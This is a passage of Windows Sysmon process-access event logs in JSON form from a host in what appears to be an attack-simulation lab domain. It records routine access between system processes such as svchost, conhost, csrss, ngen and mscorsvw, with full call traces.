l+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7672,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7673,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7674,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7675,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7676,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.215\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-00106E4C1100}\r\nTargetProcessId: 4784\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.215","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-00106E4C1100}","TargetProcessId":"4784","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7677,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.231\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-0010084E1100}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.231","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-0010084E1100}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7678,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.231\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-0010084E1100}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.231","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-0010084E1100}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7679,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-0010084E1100}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-0010084E1100}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7680,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.278\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: 